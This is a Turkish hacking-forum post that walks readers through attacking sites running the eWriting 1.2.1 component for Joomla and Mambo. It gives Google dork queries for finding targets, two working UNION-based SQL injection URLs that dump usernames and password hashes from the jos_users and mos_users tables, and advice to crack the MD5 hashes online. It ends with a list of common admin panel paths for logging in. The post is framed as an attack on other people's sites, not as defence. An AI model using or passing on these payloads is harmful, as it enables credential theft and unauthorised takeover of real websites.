hacked
MASTER
Mesaj Sayısı : 199
Kayıt tarihi : 08/03/08
 | Konu: Mambo ve Joomla'da Remote SQL Injection Açıkları | Güncel  Ptsi Mart 10, 2008 11:47 pm | |
| Bugün Sizlere eWriting 1.2.1 - SQL injection Acigindan bahsedecegim..
Google Arama Kodumuz ;
1) "Powered by eWriting 1.2.1
2) allinurl:"com_ewriting"
Ilk defa Böyle Bir Konu Aciyorum..
Aciklari olan Siteler ; Joomla ve Mambo
Bu Yüzden Iki SQL Injection'umuz Var ;
1)Joomla'daki Sitelerin Acigina Varmak Icin ;
HEDEFSITE.COM/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--
================================================== ================================================== ==================================================
2)Mambo'daki Sitelerin Acigina Varmak Icin ;
HEDEFSITE.COM/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--
Aciklar Etkilidir..
Joomla'da Sonuca varamassaniz Mambo'da deneyiniz (:
Cikan Hashi >> WWW.MD5SEARCH.ORG >> SELECT ALL >> MD5'i GIR >> OK
================================================== ==============
Burda Arayabilirsiniz
Site Admin Panelleri
www.site.com/admin
www.site.com/admin.php
www.site.com/administrator
www.site.com/administrator.php
Not ;Acik Bana Ait degildir ! Anlatimi Tamamen Bana Aittir, ve izinsiz olarak Baska sitelerde Yayinlanmasi KESINLIKLE Yasaktir!
Saygilarimi Sunarim... | |
|
Anasayfa 
Latest images 
Kayıt Ol 
Giriş yap